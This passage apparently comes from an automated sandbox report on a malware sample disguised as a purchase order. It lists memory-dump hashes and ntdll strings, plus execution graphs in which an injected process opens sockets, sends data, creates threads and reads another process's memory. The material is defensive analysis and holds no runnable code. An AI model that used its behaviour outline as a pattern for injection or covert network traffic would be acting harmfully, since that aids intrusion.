                                                                                          • Instruction Fuzzy Hash: FFF05B333426129BD7319A4DD880F537778AFD9A10F590466A604AB370E670FC028790
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 1b7835e4d6d6559359274cfa51e41153a2ed1920ea28c928af81b6d046f1638e
                                                                                          • Instruction ID: ada07caa9838e054b69fb7d5144d3149ba4cdbb10c30a579508e6f14ca79261a
                                                                                          • Opcode Fuzzy Hash: 1b7835e4d6d6559359274cfa51e41153a2ed1920ea28c928af81b6d046f1638e
                                                                                          • Instruction Fuzzy Hash: 07F0B472750305AFE318DB25CC49B56B7E9EF9C718F148078A505D71A0FAB1ED01C714
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 9a34f73ca023a4a6a785f5d272c303ec3737921b4ae57e2e5ea1d679eb78ef85
                                                                                          • Instruction ID: 6a82f82cf924bee647b39db298ef96f3083de048a4b6bea34890ae46e28ca9b9
                                                                                          • Opcode Fuzzy Hash: 9a34f73ca023a4a6a785f5d272c303ec3737921b4ae57e2e5ea1d679eb78ef85
                                                                                          • Instruction Fuzzy Hash: F1D0E93A352E80DFD65BCB1DC994B1673A4BB44F84F854494E901CB766D77CD944CA04
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8b26b5d956b916a6823f9d5f3f736f76b5a6e9545a82aefec3b8cf0bc66e7001
                                                                                          • Instruction ID: 675fed0acd571e42980f50195070bdaefab274d922f9bd75506ea46b7d64513b
                                                                                          • Opcode Fuzzy Hash: 8b26b5d956b916a6823f9d5f3f736f76b5a6e9545a82aefec3b8cf0bc66e7001
                                                                                          • Instruction Fuzzy Hash: 14C01232290648AFC722AA98DD01F427BA9EBA8B00F004021F2048B670C631EC20EA88
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                          • Instruction ID: 65896d28f8c13fecb2c0dbc674c34862a00b8ed68b32c1271e614b940cfe640e
                                                                                          • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                          • Instruction Fuzzy Hash: F2D0123710024CEFCB05DF84D854D5A772AFFD8B10F108019FD19076108A31ED62DA50
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8f322a3ca3a75a15032ed1aea1e35d659c770c91524f9ec55eaf48a423b7bcda
                                                                                          • Instruction ID: 28ef46fc8a6f553d5e02f353b43b1db4b4b52917422ae19eb15d06d6ff15588e
                                                                                          • Opcode Fuzzy Hash: 8f322a3ca3a75a15032ed1aea1e35d659c770c91524f9ec55eaf48a423b7bcda
                                                                                          • Instruction Fuzzy Hash: E1C04C357415418FCF16CB2EC284F5977E4B754B44F1548D0E805DB721D634EC50CA10
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e0308ce5ee14c24fb886fb9f14b489cdec504b92c80768c2a23305a5c2b521e7
                                                                                          • Instruction ID: 11a589cc8e0bff3b365813a91d084dec8f6a1c756489693a7125f2ca56782d2f
                                                                                          • Opcode Fuzzy Hash: e0308ce5ee14c24fb886fb9f14b489cdec504b92c80768c2a23305a5c2b521e7
                                                                                          • Instruction Fuzzy Hash: 6BC08C1E0252C149CD138F6543123D4BF6087024C0F1D0482C0C10F222C02401038626
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d6a7e2c2604d17a6bfa047b9f4fbda2068d80fac77509b42c2577b9861e14ffd
                                                                                          • Instruction ID: ea5b9ed46bc3f30bd661626afd91d0b63f9eff951d1f1f8ee2661cdfae925e8c
                                                                                          • Opcode Fuzzy Hash: d6a7e2c2604d17a6bfa047b9f4fbda2068d80fac77509b42c2577b9861e14ffd
                                                                                          • Instruction Fuzzy Hash: 6FB01232212547FFC7026738CB40B1972A9BF016C0F0D44B0EA0085430DA1C8810D501
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5a76f43673c984a86c443338df558dd14397e0cfd34f5fe83e72a06734b7e60d
                                                                                          • Instruction ID: 3754eaa7a75e4959bfd423e4684cbd189103657936180aa019bf4fdba9873520
                                                                                          • Opcode Fuzzy Hash: 5a76f43673c984a86c443338df558dd14397e0cfd34f5fe83e72a06734b7e60d
                                                                                          • Instruction Fuzzy Hash: B4900232A0580112954171595A845464005A7E0301B51C426E0414559CCB348A566361
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3c8abe47f924ac55b89a91541808ad3dc0dbbbf4c223e629259cb134dee1e296
                                                                                          • Instruction ID: 2f4c9c6ea4573f9e410029d9ea212ba3c2c1c3c675dc3777db9e49944bbbfcbb
                                                                                          • Opcode Fuzzy Hash: 3c8abe47f924ac55b89a91541808ad3dc0dbbbf4c223e629259cb134dee1e296
                                                                                          • Instruction Fuzzy Hash: DB900262A0150142454171595A044066005A7E1301391C52AA0544565CC7388955A269
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 7df2de9bc5ac1855ef373dff1f81dd1cbe770a144880f4cf4ce19c6d688e86d0
                                                                                          • Instruction ID: 24d2f67e580d86043c2ba486555253abe9d9939ba090d8bb39e3a957e12ceb77
                                                                                          • Opcode Fuzzy Hash: 7df2de9bc5ac1855ef373dff1f81dd1cbe770a144880f4cf4ce19c6d688e86d0
                                                                                          • Instruction Fuzzy Hash: B1900437711401030507F55D17045070047D7D5351351C437F1005555CD731CD717131
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6234a8fbc63120369c8c12953eb1aefe9b5572ef19ae303a3fca30769143313d
                                                                                          • Instruction ID: 27f3f7fa83f3f0804a14bf54de16fc37ce323f06e2c3f285f24d044d0f907ce4
                                                                                          • Opcode Fuzzy Hash: 6234a8fbc63120369c8c12953eb1aefe9b5572ef19ae303a3fca30769143313d
                                                                                          • Instruction Fuzzy Hash: 599002A2601541924901B2599604B0A450597E0301B51C42BE1044565CC6358951A135
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d61cf15b202f48f896ad284beb365b1f255bae7f703eb8e1e3d3c375017b0aef
                                                                                          • Instruction ID: 5286086911b5b0d56804df8c7bd0a07a1e7aec003499b8276808060df9332848
                                                                                          • Opcode Fuzzy Hash: d61cf15b202f48f896ad284beb365b1f255bae7f703eb8e1e3d3c375017b0aef
                                                                                          • Instruction Fuzzy Hash: AC90023260140902D5817159560464A000597D1301F91C42AA0015659DCB358B5977A1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 543443fd063da0a46021e4a3b2509273930cfc37d74fc79b936e226d66c2991f
                                                                                          • Instruction ID: 7b9f9534449c759078a80dd27cabf6d10734906ee7bf8d9b016e6ed576ad3cae
                                                                                          • Opcode Fuzzy Hash: 543443fd063da0a46021e4a3b2509273930cfc37d74fc79b936e226d66c2991f
                                                                                          • Instruction Fuzzy Hash: 9B90023260544942D54171595604A46001597D0305F51C426A0054699DD7358E55B661
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 692f66099984f8ab265ddb88e006ef67d0d1ac19719801f448ef770a553190aa
                                                                                          • Instruction ID: a3e3f79a2d804a5e2519329a808fe2c4ef4fc34eedb77470b74bcf62793b25ad
                                                                                          • Opcode Fuzzy Hash: 692f66099984f8ab265ddb88e006ef67d0d1ac19719801f448ef770a553190aa
                                                                                          • Instruction Fuzzy Hash: D090023260140942D50171595604B46000597E0301F51C42BA0114659DC735C9517521
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 7199fff9204772b78dae40fad4ab89b2c6799c6dd7969fe0a40eaa68d83b38c2
                                                                                          • Instruction ID: 5335867fa7ac227253b7195333932ab86351bd0c8c933f0c075b4143215c66fe
                                                                                          • Opcode Fuzzy Hash: 7199fff9204772b78dae40fad4ab89b2c6799c6dd7969fe0a40eaa68d83b38c2
                                                                                          • Instruction Fuzzy Hash: 60900222A0540502D54171596618706001597D0301F51D426A0014559DC7798B5576A1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0d72e85ce232e180d39c63b90d05e987e281dd8979f2234a0ba8849fdf5b1b18
                                                                                          • Instruction ID: 5bd98b99a52ca7ecc9ff73c587154081f3c097605fcdde3ce69c46013edd24ec
                                                                                          • Opcode Fuzzy Hash: 0d72e85ce232e180d39c63b90d05e987e281dd8979f2234a0ba8849fdf5b1b18
                                                                                          • Instruction Fuzzy Hash: A1900226621401020546B559170450B0445A7D6351391C42AF1406595CC73189656321
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: df2aa6cce93c09746895d1bd5df3b09a9bd0d728f3df2473fa995e0b5561307b
                                                                                          • Instruction ID: 4f34bc48e17414a1fccb9906d98809745fcbab934590f76b6b8c34b5ffa19cf5
                                                                                          • Opcode Fuzzy Hash: df2aa6cce93c09746895d1bd5df3b09a9bd0d728f3df2473fa995e0b5561307b
                                                                                          • Instruction Fuzzy Hash: BD90023260140902D50571595A04686000597D0301F51C426A601465AED77589917131
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e3e39d6ea71563c79d5a09ec20867a4bd3c7333cc6dfdb03234c3b963a9af2de
                                                                                          • Instruction ID: ed1babc57afb383d167c959e9a2f7c94b7ec67e4eb97e7264a0ba2f7f2353c83
                                                                                          • Opcode Fuzzy Hash: e3e39d6ea71563c79d5a09ec20867a4bd3c7333cc6dfdb03234c3b963a9af2de
                                                                                          • Instruction Fuzzy Hash: EB900232A0540902D55171595614746000597D0301F51C426A0014659DC7758B5576A1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Instruction ID: 460090df2f4969e08204477fe00ccb76021e563b05be0c414b21ee48f31b134f
                                                                                          • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                          • Instruction Fuzzy Hash:
                                                                                          Strings
                                                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0142454D
                                                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 01424507
                                                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01424530
                                                                                          • Execute=1, xrefs: 0142451E
                                                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01424460
                                                                                          • ExecuteOptions, xrefs: 014244AB
                                                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 01424592
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                          • API String ID: 0-484625025
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $$@$@w]v
                                                                                          • API String ID: 0-1680669722

                                                                                          Execution Graph

                                                                                          Execution Coverage:4.7%
                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                          Signature Coverage:0%
                                                                                          Total number of Nodes:42
                                                                                          Total number of Limit Nodes:3
                                                                                          execution_graph 5195 6a049a 5199 6a04c4 5195->5199 5196 6a0555 5197 6a04eb SleepEx 5197->5199 5199->5196 5199->5197 5200 69efe8 5199->5200 5201 69f02a 5200->5201 5202 69f0c4 5201->5202 5203 69f0ad SleepEx 5201->5203 5202->5199 5203->5201 5204 6a8378 5205 6a83c1 5204->5205 5206 6a83f5 send 5205->5206 5207 6a84c9 5208 6a8464 5207->5208 5210 6a84d4 5207->5210 5209 6a84a5 connect 5208->5209 5211 6a8549 closesocket 5210->5211 5212 6abe29 5213 6abe31 5212->5213 5215 6abdd8 5213->5215 5216 69f868 5213->5216 5218 69f892 5216->5218 5217 69f915 5217->5215 5218->5217 5219 69f8e7 CreateThread 5218->5219 5219->5215 5227 69f85a 5228 69f75e 5227->5228 5229 69f864 5227->5229 5230 69f915 5229->5230 5231 69f8e7 CreateThread 5229->5231 5220 6a822e 5221 6a8280 5220->5221 5222 6a82b4 socket 5221->5222 5235 6a836d 5236 6a8370 5235->5236 5238 6a83c1 5235->5238 5237 6a83f5 send 5238->5237 5223 6a98c2 5224 6a98f0 5223->5224 5225 6a98f4 5224->5225 5226 6a9930 LdrLoadDll 5224->5226 5226->5225 5232 6a8422 5233 6a8428 5232->5233 5234 6a84a5 connect 5233->5234

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.6024252717.0000000000670000.00000040.80000000.00040000.00000000.sdmp, Offset: 00670000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_670000_RAVCpl64.jbxd
                                                                                          Similarity
                                                                                          • API ID: closesocketconnect
                                                                                          • String ID:
                                                                                          • API String ID: 1323028321-0

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 15 69f7da-69f7e8 16 69f7ea-69f7f1 15->16 17 69f7ff-69f80e 15->17 16->17 18 69f7b2-69f7c7 16->18 21 69f7d0-69f7d3 17->21 22 69f810-69f859 call 6abfe8 17->22 18->21 23 69f781-69f78e 21->23 24 69f7d5-69f7d9 21->24
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.6024252717.0000000000670000.00000040.80000000.00040000.00000000.sdmp, Offset: 00670000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_670000_RAVCpl64.jbxd

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 29 69efe8-69f024 30 69f02a-69f02e 29->30 31 69f0b5-69f0be 30->31 32 69f034-69f037 30->32 31->30 33 69f0c4-69f0cd 31->33 32->31 34 69f039-69f0ab call 6abfe8 call 6abfb8 call 6ac728 32->34 35 69f10f-69f12e 33->35 36 69f0cf-69f0d6 33->36 34->31 48 69f0ad-69f0b3 SleepEx 34->48 38 69f0d8-69f0df 36->38 39 69f0f4-69f0fd 36->39 41 69f0e8-69f0f2 38->41 39->35 42 69f0ff-69f106 39->42 41->39 41->41 42->35 44 69f108-69f109 42->44 44->35 48->31
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.6024252717.0000000000670000.00000040.80000000.00040000.00000000.sdmp, Offset: 00670000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_670000_RAVCpl64.jbxd
                                                                                          Similarity
                                                                                          • API ID: Sleep
                                                                                          • String ID:
                                                                                          • API String ID: 3472027048-0

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.6024252717.0000000000670000.00000040.80000000.00040000.00000000.sdmp, Offset: 00670000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_670000_RAVCpl64.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateThread
                                                                                          • String ID:
                                                                                          • API String ID: 2422867632-0

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 74 6a049a-6a04e7 call 69b2f8 call 6ab5b8 79 6a04e9 74->79 80 6a0555-6a0564 74->80 81 6a04eb-6a0500 SleepEx 79->81 82 6a0542-6a0549 81->82 83 6a0502-6a0506 81->83 82->81 85 6a054b-6a0553 call 6a0428 82->85 83->81 84 6a0508-6a0513 83->84 84->81 86 6a0515-6a051b 84->86 85->81 86->81 88 6a051d-6a0520 86->88 88->81 90 6a0522-6a0533 call 6a69d8 call 69efe8 88->90 94 6a0538-6a0540 call 69f138 90->94 94->81
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.6024252717.0000000000670000.00000040.80000000.00040000.00000000.sdmp, Offset: 00670000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_670000_RAVCpl64.jbxd
                                                                                          Similarity
                                                                                          • API ID: Sleep
                                                                                          • String ID:
                                                                                          • API String ID: 3472027048-0

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 97 6a8378-6a83b8 98 6a83c1-6a83c9 97->98 99 6a83bc call 6a4f48 97->99 100 6a83cb-6a83ef call 6ab5b8 98->100 101 6a83f5-6a8420 send 98->101 99->98 100->101
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.6024252717.0000000000670000.00000040.80000000.00040000.00000000.sdmp, Offset: 00670000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_670000_RAVCpl64.jbxd
                                                                                          Similarity
                                                                                          • API ID: send
                                                                                          • String ID:
                                                                                          • API String ID: 2809346765-0

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 104 6a8422-6a8479 call 6a4fd8 108 6a847b-6a849f call 6ab5b8 104->108 109 6a84a5-6a84c8 connect 104->109 108->109
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.6024252717.0000000000670000.00000040.80000000.00040000.00000000.sdmp, Offset: 00670000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_670000_RAVCpl64.jbxd
                                                                                          Similarity
                                                                                          • API ID: connect
                                                                                          • String ID:
                                                                                          • API String ID: 1959786783-0

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 112 6a822e-6a8288 call 6a4e18 115 6a828a-6a82ae call 6ab5b8 112->115 116 6a82b4-6a82d5 socket 112->116 115->116
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.6024252717.0000000000670000.00000040.80000000.00040000.00000000.sdmp, Offset: 00670000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_670000_RAVCpl64.jbxd
                                                                                          Similarity
                                                                                          • API ID: socket
                                                                                          • String ID:
                                                                                          • API String ID: 98920635-0

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 119 6a98c2-6a98f2 call 6ac548 122 6a98ff-6a990b call 6af9f8 119->122 123 6a98f4-6a98fe 119->123 126 6a9919-6a992e call 6abd38 122->126 127 6a990d-6a9914 call 6afcc8 122->127 131 6a994c-6a9954 126->131 132 6a9930-6a9945 LdrLoadDll 126->132 127->126 132->131
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.6024252717.0000000000670000.00000040.80000000.00040000.00000000.sdmp, Offset: 00670000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_670000_RAVCpl64.jbxd
                                                                                          Similarity
                                                                                          • API ID: Load
                                                                                          • String ID:
                                                                                          • API String ID: 2234796835-0

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 133 69f868-69f890 134 69f8b3-69f8e0 call 69b2f8 call 6ab5b8 133->134 135 69f892-69f89d call 6abe18 133->135 143 69f8e2-69f914 call 6afebb CreateThread 134->143 144 69f915-69f91f 134->144 135->134 140 69f89f-69f8a9 135->140 140->134
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.6024252717.0000000000670000.00000040.80000000.00040000.00000000.sdmp, Offset: 00670000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_670000_RAVCpl64.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateThread
                                                                                          • String ID:
                                                                                          • API String ID: 2422867632-0

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 147 6a836d-6a836e 148 6a8370-6a8377 147->148 149 6a83c1-6a83c9 147->149 150 6a83cb-6a83ef call 6ab5b8 149->150 151 6a83f5-6a8420 send 149->151 150->151
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.6024252717.0000000000670000.00000040.80000000.00040000.00000000.sdmp, Offset: 00670000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_670000_RAVCpl64.jbxd
                                                                                          Similarity
                                                                                          • API ID: send
                                                                                          • String ID:
                                                                                          • API String ID: 2809346765-0

                                                                                          Execution Graph

                                                                                          Execution Coverage:0.4%
                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                          Signature Coverage:0%
                                                                                          Total number of Nodes:11
                                                                                          Total number of Limit Nodes:1
                                                                                          execution_graph 82050 4a02b20 82052 4a02b2a 82050->82052 82053 4a02b31 82052->82053 82054 4a02b3f LdrInitializeThunk 82052->82054 82063 4a029f0 LdrInitializeThunk 82069 4ceedd8 82070 4ceedfd 82069->82070 82071 4ceef68 NtQueryInformationProcess 82070->82071 82074 4ceefd5 82070->82074 82072 4ceefa2 82071->82072 82073 4cef074 NtReadVirtualMemory 82072->82073 82072->82074 82073->82074

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
